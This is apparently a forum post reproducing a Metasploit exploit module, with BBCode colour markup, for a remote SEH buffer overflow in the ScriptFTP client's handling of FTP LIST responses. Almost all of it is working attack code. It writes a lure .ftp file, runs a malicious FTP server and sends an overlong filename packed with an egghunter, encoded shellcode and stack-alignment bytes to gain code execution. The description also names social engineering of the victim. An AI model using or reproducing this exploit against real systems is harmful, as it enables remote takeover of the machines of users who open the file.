Kod:
[/COLOR]
[COLOR=#008200]## [/COLOR]
[COLOR=#008200]# $Id: scriptftp_list.rb 13841 2011-10-09 05:36:42Z sinn3r $ [/COLOR]
[COLOR=#008200]## [/COLOR]
[COLOR=#008200]## [/COLOR]
[COLOR=#008200]# This file is part of the ****sploit Framework and may be subject to [/COLOR]
[COLOR=#008200]# redistribution and commercial restrictions. Please see the ****sploit [/COLOR]
[COLOR=#008200]# Framework web site for more information on licensing and terms of use. [/COLOR]
[COLOR=#008200]# http://****sploit.com/framework/ [/COLOR]
[COLOR=#008200]## [/COLOR]
[B][COLOR=#006699]class[/COLOR][/B] ****sploit3 < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::Remote::FtpServer
include Msf::Exploit::[COLOR=#0066cc]FILEFORMAT[/COLOR]
include Msf::Exploit::Egghunter
[B][COLOR=#006699]def[/COLOR][/B] initialize(info = {})
[B][COLOR=#006699]super[/COLOR][/B](update_info(info,
[COLOR=#0000ff]'Name'[/COLOR] => [COLOR=#0000ff]'ScriptFTP <= 3.3 Remote Buffer Overflow (LIST)'[/COLOR],
[COLOR=#0000ff]'Description'[/COLOR] => %q{
AmmSoft's ScriptFTP client is susceptible to a remote buffer overflow
vulnerability that is triggered [B][COLOR=#006699]when[/COLOR][/B] processing a sufficiently long filename during
a [COLOR=#0066cc]FTP[/COLOR] [COLOR=#0066cc]LIST[/COLOR] command resulting [B][COLOR=#006699]in[/COLOR][/B] overwriting the exception handler. Social engineering
of executing a specially crafted ftp file by double click will result [B][COLOR=#006699]in[/COLOR][/B] connecting to
our malcious server [B][COLOR=#006699]and[/COLOR][/B] perform arbitrary code execution which allows the attacker
to gain the same rights as the user running ScriptFTP.
},
[COLOR=#0000ff]'License'[/COLOR] => [COLOR=#0066cc]MSF_LICENSE[/COLOR],
[COLOR=#0000ff]'Version'[/COLOR] => [COLOR=#0000ff]"$Revision: 13841 $"[/COLOR],
[COLOR=#0000ff]'Author'[/COLOR] =>
[
[COLOR=#0000ff]'modpr0be'[/COLOR], [COLOR=#008200]#Vulnerability discovery and original exploit [/COLOR]
[COLOR=#0000ff]'TecR0c <roccogiovannicalvi[at]gmail.com>'[/COLOR], [COLOR=#008200]# ****sploit module [/COLOR]
[COLOR=#0000ff]'mr_me <steventhomasseeley[at]gmail.com>'[/COLOR], [COLOR=#008200]# ****sploit module [/COLOR]
],
[COLOR=#0000ff]'References'[/COLOR] =>
[
[COLOR=#008200]#[ 'CVE', '?' ], [/COLOR]
[COLOR=#008200]#[ 'OSVDB', '?' ], [/COLOR]
[ [COLOR=#0000ff]'URL'[/COLOR], [COLOR=#0000ff]'http://www.exploit-db.com/exploits/17876/'[/COLOR] ],
[ [COLOR=#0000ff]'URL'[/COLOR], [COLOR=#0000ff]'http://www.kb.cert.org/vuls/id/440219'[/COLOR] ],
],
[COLOR=#0000ff]'DefaultOptions'[/COLOR] =>
{
[COLOR=#0000ff]'EXITFUNC'[/COLOR] => [COLOR=#0000ff]'thread'[/COLOR],
[COLOR=#0000ff]'DisablePayloadHandler'[/COLOR] => [COLOR=#0000ff]'false'[/COLOR],
},
[COLOR=#0000ff]'Payload'[/COLOR] =>
{
[COLOR=#0000ff]'BadChars'[/COLOR] => [COLOR=#0000ff]"\x00\xff\x0d\x5c\x2f\x0a"[/COLOR],
[COLOR=#0000ff]'EncoderType'[/COLOR] => Msf::Encoder::Type::AlphanumMixed,
[COLOR=#0000ff]'EncoderOptions'[/COLOR] =>
{
[COLOR=#0000ff]'BufferRegister'[/COLOR] => [COLOR=#0000ff]'EDI'[/COLOR], [COLOR=#008200]# Egghunter jmp edi [/COLOR]
}
},
[COLOR=#0000ff]'Platform'[/COLOR] => [COLOR=#0000ff]'win'[/COLOR],
[COLOR=#0000ff]'Targets'[/COLOR] =>
[
[COLOR=#008200]# CALL DWORD PTR SS:[EBP-4] [/COLOR]
[COLOR=#008200]# scriptftp.exe - File version=Build 3/9/2009 [/COLOR]
[ [COLOR=#0000ff]'Windows XP SP3 / Windows Vista'[/COLOR], { [COLOR=#0000ff]'Offset'[/COLOR] => [COLOR=#0066cc]1746[/COLOR], [COLOR=#0000ff]'Ret'[/COLOR] => [COLOR=#0000ff]"\xd6\x41"[/COLOR] } ],
],
[COLOR=#0000ff]'Privileged'[/COLOR] => [B][COLOR=#006699]false[/COLOR][/B],
[COLOR=#0000ff]'DisclosureDate'[/COLOR] => [COLOR=#0000ff]'Oct 12 2011'[/COLOR],
[COLOR=#0000ff]'DefaultTarget'[/COLOR] => [COLOR=#0066cc]0[/COLOR]))
register_options(
[
OptString.[B][COLOR=#006699]new[/COLOR][/B]([COLOR=#0000ff]'FILENAME'[/COLOR], [ [B][COLOR=#006699]true[/COLOR][/B], [COLOR=#0000ff]'The file name.'[/COLOR], [COLOR=#0000ff]'msf.ftp'[/COLOR]]),
], [B][COLOR=#006699]self[/COLOR][/B].[B][COLOR=#006699]class[/COLOR][/B])
[B][COLOR=#006699]end[/COLOR][/B]
[B][COLOR=#006699]def[/COLOR][/B] setup
[B][COLOR=#006699]if[/COLOR][/B] datastore[[COLOR=#0000ff]'SRVHOST'[/COLOR]] == [COLOR=#0000ff]'0.0.0.0'[/COLOR]
lhost = Rex::Socket.source_address([COLOR=#0000ff]'50.50.50.50'[/COLOR])
[B][COLOR=#006699]else[/COLOR][/B]
lhost = datastore[[COLOR=#0000ff]'SRVHOST'[/COLOR]]
[B][COLOR=#006699]end[/COLOR][/B]
ftp_file = [COLOR=#0000ff]"OPENHOST('#{lhost}','ftp','ftp')\r\n"[/COLOR]
ftp_file << [COLOR=#0000ff]"SETPASSIVE(ENABLED)\r\n"[/COLOR]
ftp_file << [COLOR=#0000ff]"GETLIST($list,REMOTE_FILES)\r\n"[/COLOR]
ftp_file << [COLOR=#0000ff]"CLOSEHOST\r\n"[/COLOR]
print_status([COLOR=#0000ff]"Creating '#{datastore['FILENAME']}'..."[/COLOR])
file_create(ftp_file)
[B][COLOR=#006699]super[/COLOR][/B]
[B][COLOR=#006699]end[/COLOR][/B]
[B][COLOR=#006699]def[/COLOR][/B] on_client_unknown_command(c,cmd,arg)
c.put([COLOR=#0000ff]"200 OK\r\n"[/COLOR])
[B][COLOR=#006699]end[/COLOR][/B]
[B][COLOR=#006699]def[/COLOR][/B] on_client_command_list(c,arg)
conn = establish_data_connection(c)
[B][COLOR=#006699]if[/COLOR][/B]([B][COLOR=#006699]not[/COLOR][/B] conn)
c.put([COLOR=#0000ff]"425 Can't build data connection\r\n"[/COLOR])
[B][COLOR=#006699]return[/COLOR][/B]
[B][COLOR=#006699]end[/COLOR][/B]
print_status([COLOR=#0000ff]" - Data connection set up"[/COLOR])
code = [COLOR=#0066cc]150[/COLOR]
c.put([COLOR=#0000ff]"#{code} Here comes the directory listing.\r\n"[/COLOR])
code = [COLOR=#0066cc]226[/COLOR]
c.put([COLOR=#0000ff]"#{code} Directory send ok.\r\n"[/COLOR])
eggoptions =
{
[COLOR=#ff1493]:checksum[/COLOR] => [B][COLOR=#006699]false[/COLOR][/B],
[COLOR=#ff1493]:eggtag[/COLOR] => [COLOR=#0000ff]'cure'[/COLOR]
}
hunter, egg = generate_egghunter(payload.encoded, payload_badchars, eggoptions)
[COLOR=#008200]# Encode with alphamixed, then unicode mixed [/COLOR]
[ [COLOR=#0000ff]'x86/alpha_mixed'[/COLOR], [COLOR=#0000ff]'x86/unicode_mixed'[/COLOR] ].[B][COLOR=#006699]each[/COLOR][/B] { |name|
enc = framework.encoders.create(name)
[B][COLOR=#006699]if[/COLOR][/B] name =~ /unicode/
[COLOR=#008200]# aligned to ESP & EAX [/COLOR]
enc.datastore.import_options_from_hash({ [COLOR=#0000ff]'BufferRegister'[/COLOR] => [COLOR=#0000ff]'EAX'[/COLOR] })
[B][COLOR=#006699]else[/COLOR][/B]
enc.datastore.import_options_from_hash({ [COLOR=#0000ff]'BufferRegister'[/COLOR] => [COLOR=#0000ff]'EDX'[/COLOR] })
[B][COLOR=#006699]end[/COLOR][/B]
[COLOR=#008200]# NOTE: we already eliminated badchars [/COLOR]
hunter = enc.encode(hunter, [B][COLOR=#006699]nil[/COLOR][/B], [B][COLOR=#006699]nil[/COLOR][/B], platform)
[B][COLOR=#006699]if[/COLOR][/B] name =~/alpha/
[COLOR=#008200]#insert getpc_stub & align EDX, unicode encoder friendly. [/COLOR]
[COLOR=#008200]#Hardcoded stub is not an issue here because it gets encoded anyway [/COLOR]
getpc_stub = [COLOR=#0000ff]"\x89\xe1\xdb\xcc\xd9\x71\xf4\x5a\x83\xc2\x41\x83\xea\x35"[/COLOR]
hunter = getpc_stub + hunter
[B][COLOR=#006699]end[/COLOR][/B]
}
unicode_nop = [COLOR=#0000ff]"\x6d"[/COLOR] [COLOR=#008200]# DD BYTE PTR DS:[ECX],AL [/COLOR]
nseh = [COLOR=#0000ff]"\x61"[/COLOR] << unicode_nop
seh = target.ret
alignment = [COLOR=#0000ff]"\x54"[/COLOR] [COLOR=#008200]# PUSH ESP [/COLOR]
alignment << unicode_nop
alignment << [COLOR=#0000ff]"\x58"[/COLOR] [COLOR=#008200]# POP EAX [/COLOR]
alignment << unicode_nop
alignment << [COLOR=#0000ff]"\x05\x12\x11"[/COLOR] [COLOR=#008200]# ADD EAX,11001200 [/COLOR]
alignment << unicode_nop
alignment << [COLOR=#0000ff]"\x2d\x01\x01"[/COLOR] [COLOR=#008200]# SUB EAX,1000100 [/COLOR]
alignment << unicode_nop
alignment << [COLOR=#0000ff]"\x2d\x01\x10"[/COLOR] [COLOR=#008200]# SUB EAX,10000100 [/COLOR]
alignment << unicode_nop
alignment << [COLOR=#0000ff]"\x50"[/COLOR] [COLOR=#008200]# PUSH EAX [/COLOR]
alignment << unicode_nop
alignment << [COLOR=#0000ff]"\xc3"[/COLOR] [COLOR=#008200]# RETN [/COLOR]
buffer = rand_text_alpha([COLOR=#0066cc]656[/COLOR])
buffer << hunter
buffer << rand_text_alpha(target[[COLOR=#0000ff]'Offset'[/COLOR]]-buffer.length)
buffer << nseh
buffer << seh
buffer << alignment
buffer << rand_text_alpha([COLOR=#0066cc]500[/COLOR])
buffer << egg
print_status([COLOR=#0000ff]" - Sending directory list via data connection"[/COLOR])
dirlist = [COLOR=#0000ff]"-rwxr-xr-x 5 ftpuser ftpusers 512 Jul 26 2001 #{buffer}.txt\r\n"[/COLOR]
dirlist << [COLOR=#0000ff]" 5 ftpuser ftpusers 512 Jul 26 2001 A\r\n"[/COLOR]
dirlist << [COLOR=#0000ff]"rwxr-xr-x 5 ftpuser ftpusers 512 Jul 26 2001 #{buffer}.txt\r\n"[/COLOR]
conn.put(dirlist)
conn.close
[B][COLOR=#006699]return[/COLOR][/B]
[B][COLOR=#006699]end[/COLOR][/B]
[B][COLOR=#006699]end[/COLOR][/B]
